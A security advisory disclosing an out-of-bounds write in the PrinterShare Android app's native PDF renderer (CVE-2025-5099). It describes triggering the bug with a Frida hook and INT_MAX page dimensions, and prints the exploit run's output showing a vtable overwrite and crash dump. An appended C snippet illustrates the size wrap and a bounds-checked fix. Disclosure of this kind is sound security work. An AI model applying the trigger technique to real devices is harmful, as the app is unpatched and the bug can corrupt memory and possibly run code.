KL-001-2025-004: Mobile Dynamix PrinterShare Mobile Print Out-of-bounds Write

Title: Mobile Dynamix PrinterShare Mobile Print Out-of-bounds Write
Advisory ID: KL-001-2025-004
Publication Date: 2025-05-22
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-004.txt

1. Vulnerability Details

   Affected Vendor: Mobile Dynamix
   Affected Product: PrinterShare Mobile Print
   Affected Version: up to 12.15.01
   Platform: Android
   CWE Classification: CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer,
                       CWE-787: Out-of-bounds Write
   CVE ID: CVE-2025-5099

2. Vulnerability Description

   An out-of-bounds write occurs when the native library renders a PDF. It can be
   exploited to corrupt memory and potentially achieve arbitrary code execution.

3. Technical Description

   * Performed on Android 13 aarch64 - rooted Samsung device (Galaxy Tab A7 Lite).
   * Using the Frida client on Ubuntu 24.04 LTS and the Frida server on the rooted Samsung device.
   * Play Store location: https://play.google.com/store/apps/details?id=com.dynamixsoftware.printershare&hl=en-US
   * The target Activity has exported set to true, which means any application may
     interact with it, provided the required permissions are granted.

   The ActivityPrintDocuments class processes PDF files through JNI calls to native
   libraries. The vulnerability exists in the native component (libpdfrender.so) that
   handles PDF rendering and can be triggered when processing PDF files with
   manipulated dimensions and structure.

   The vulnerability is reachable through the ActivityPrintDocuments class, which is
   launched when a PDF file is opened. The rendering happens in class j (a subclass
   of h), which calls the vulnerable native function:

   // From activityprintdocuments.java
   class j extends h {
       @Override
       public void a(Canvas canvas, boolean z2) {
           // ...
           int drawPage = PDFrender.drawPage(this.f5155a, iArr, fArr2, i3, bitmap);
           // ...
       }
   }

   The shared object function performs memory operations without proper validation,
   allowing attackers to manipulate memory via crafted inputs. Decompiled excerpt:

   undefined8 entry(long base_addr, int flag, char option) {
       // ...
       temp_long = *(long *)(base_addr + 0x90);
       *(undefined4 *)(temp_long + 0x18) = 0;
       // ... [Insufficient bounds checking on pointers]
       *(undefined8 *)(temp_long + 0x28) = 0;
       *(undefined8 *)(temp_long + 0x20) = 0;
       *(ulong *)(temp_long + 0x10) = temp_ulong;
       // ...
   }

   The Frida script hooks critical native functions in libpdfrender.so, in particular
   Java_com_dynamixsoftware_printershare_PDFrender_drawPage. It creates a malformed
   PDF with extreme dimensions (values of 0x7FFFFFFF, i.e. INT_MAX) designed to
   trigger buffer overflows. When the drawPage native function is called with these
   corrupted parameters, memory corruption results.

   $ frida -U -f com.dynamixsoftware.printershare -l exploit.js
        ____
       / _  |   Frida 16.6.5 - A world-class dynamic instrumentation toolkit
      | (_| |
       > _  |   Commands:
      /_/ |_|       help      -> Displays the help system
      . . . .       object?   -> Display information about 'object'
      . . . .       exit/quit -> Exit
      . . . .
      . . . .   More info at https://frida.re/docs/home/
      . . . .
      . . . .
      . . . .   Connected to SM T220 (id=R83X10JATAV)
   Spawning `com.dynamixsoftware.printershare`...
   Spawned `com.dynamixsoftware.printershare`. Resuming main thread!
   [SM T220::com.dynamixsoftware.printershare ]-> [!] Terminal exploitation initialized
   [!] Initiating terminal exploit sequence
   [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run
   [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$h.a
   [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$j.a
   [!] Creating terminal exploit PDF
   [+] Using existing exploit PDF
   [!] Launching with payload at /sdcard/Download/terminal_exploit.pdf
   [!] Called com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run
   [+] Found libpdfrender.so at 0x75521e4000
   [!] Found critical function pointer: 0x75521e4e98
   ...SNIP...
   [!] Target function called
   [*] Original pageNum: 0x76b5496bc0
   [-] Error modifying dimensions: Error: access violation accessing 0x0
   [*] Flags changed: 0 -> 2065
   [!] Called critical function: 0xb4000075790586a0
   [*] Potential vtable: 0xb4000075790586a0 -> 0x762801f5a0
   [!] Overwrote potential vtable with "AAAAAAAA"
   [!] MEMORY MODIFIED at 0xb4000075790586a0 (vtable pointer):
   BEFORE:
   00000000  a0 f5 01 28 76 00 00 00  ...(v...
   AFTER:
   00000000  00 40 41 41 41 41 41 41  .@AAAAAA
   [!] Corrupted 64-byte memory chunk starting at object
   [!] MEMORY MODIFIED at 0xb4000075790586a0 (object memory):
   BEFORE:
   00000000  00 40 41 41 41 41 41 41 00 b8 e3 78 75 00 00 b4  .@AAAAAA...xu...
   00000010  80 03 e9 29 76 00 00 b4 00 00 00 00 00 00 00 00  ...)v...........
   00000020  80 00 00 00 fc ff ff ff 00 fe 3f d0 76 00 00 00  ..........?.v...
   00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
   AFTER:
   00000000  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
   00000010  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
   00000020  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
   00000030  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
   [!] Target function returned: 0xffffffff
   [-] Post-function corruption error: Error: invalid operation
   Process crashed: Bad access due to invalid address

   *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
   Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys'
   Revision: '0'
   ABI: 'arm64'
   Processor: '4'
   Timestamp: 2025-03-03 09:31:59.556177436-0800
   Process uptime: 4s
   Cmdline: com.dynamixsoftware.printershare
   pid: 31838, tid: 32000, name: Thread-17  >>> com.dynamixsoftware.printershare <<<
   uid: 10243
   signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414000
       x0  b4000075790586a0  x1  0000000000000003  x2  0000000000000000  x3  0000000000000000
       x4  0000000000000000  x5  0000000000000000  x6  0000000000000000  x7  0000000000000000
       x8  0000000000004200  x9  0000007627bdd114  x10 0000007553d43d50  x11 0000007553d43cd0
       x12 0000000000000008  x13 00000076c4d36f78  x14 0000000000000010  x15 00000076d2300a00
       x16 000000761084cf48  x17 00000076cd911f30  x18 0000000000000000  x19 0000000000000003
       x20 b4000075790586a0  x21 4141414141414000  x22 000000760f393a40  x23 0000007553d47000
       x24 0000000000000010  x25 00000076d22fe840  x26 0000000000000002  x27 0000007553d43ed0
       x28 0000000000000010  x29 0000007553d43d40
       lr  000000760fb92440  sp  0000007553d43d00  pc  0000007627bdd168  pst 0000000060000000
   ...SNIP...

4. Mitigation and Remediation Recommendation

   No response from vendor. There are no known mitigations for end users of the
   affected application versions.

5. Credit

   This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc.

6. Disclosure Timeline

   2025-04-09 : KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.
   2025-04-11 : KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.
   2025-04-29 : KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com.
   2025-05-22 : KoreLogic public disclosure.

7. Proof of Concept

   URL: https://korelogic.com/Resources/Advisories/KL-001-2025-004.poc.js.txt
   SHA256sum: 8f1df24eb0027d8bfc13092988839c5f8a3fb39a57912d338af719b23d253b2c

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed
under a Creative Commons Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record
of providing security services to entities ranging from Fortune 500 to small and
mid-sized companies. We are a highly skilled team of senior security consultants
doing by-hand security assessments for the most important networks in the U.S. and
around the world. We are also developers of various tools and resources aimed at
helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
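As an added illustration (not KoreLogic's PoC and not the vendor's code) of the arithmetic behind the dimension-triggered write in section 3: a hypothetical C page-buffer sizing routine showing how a page declared as 0x7FFFFFFF x 0x7FFFFFFF wraps to a 4-byte allocation under unchecked 32-bit arithmetic, beside a checked version that rejects it before anything is allocated. BYTES_PER_PIXEL, MAX_PAGE_DIM and the function names are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical constants, not taken from libpdfrender.so. */
#define BYTES_PER_PIXEL 4      /* assumed ARGB_8888 render target */
#define MAX_PAGE_DIM    20000  /* assumed policy cap on page width/height in pixels */

/* Unchecked sizing of the kind the advisory describes: 32-bit arithmetic wraps,
 * so a page declared as 0x7FFFFFFF x 0x7FFFFFFF sizes to only 4 bytes while a
 * render loop would still step over width*height pixels and write past the end. */
uint32_t naive_page_bytes(uint32_t width, uint32_t height) {
    return width * height * BYTES_PER_PIXEL;
}

/* Hardened sizing: reject non-positive or oversized dimensions before any
 * allocation, and compute the byte count in 64 bits with an explicit fit check. */
bool checked_page_bytes(int64_t width, int64_t height, size_t *out_bytes) {
    if (width <= 0 || height <= 0) return false;
    if (width > MAX_PAGE_DIM || height > MAX_PAGE_DIM) return false;
    uint64_t pixels = (uint64_t)width * (uint64_t)height; /* bounded by the cap, cannot wrap */
    if (pixels > SIZE_MAX / BYTES_PER_PIXEL) return false; /* would not fit in size_t */
    *out_bytes = (size_t)pixels * BYTES_PER_PIXEL;
    return true;
}

/* Render stand-in: allocate only after validation and return the number of bytes
 * written, or 0 when the page is rejected. memset stands in for rasterisation. */
size_t render_page(int64_t width, int64_t height) {
    size_t bytes;
    if (!checked_page_bytes(width, height, &bytes)) return 0;
    uint8_t *bitmap = malloc(bytes);
    if (bitmap == NULL) return 0;
    memset(bitmap, 0xFF, bytes); /* every write stays inside the checked allocation */
    free(bitmap);
    return bytes;
}
```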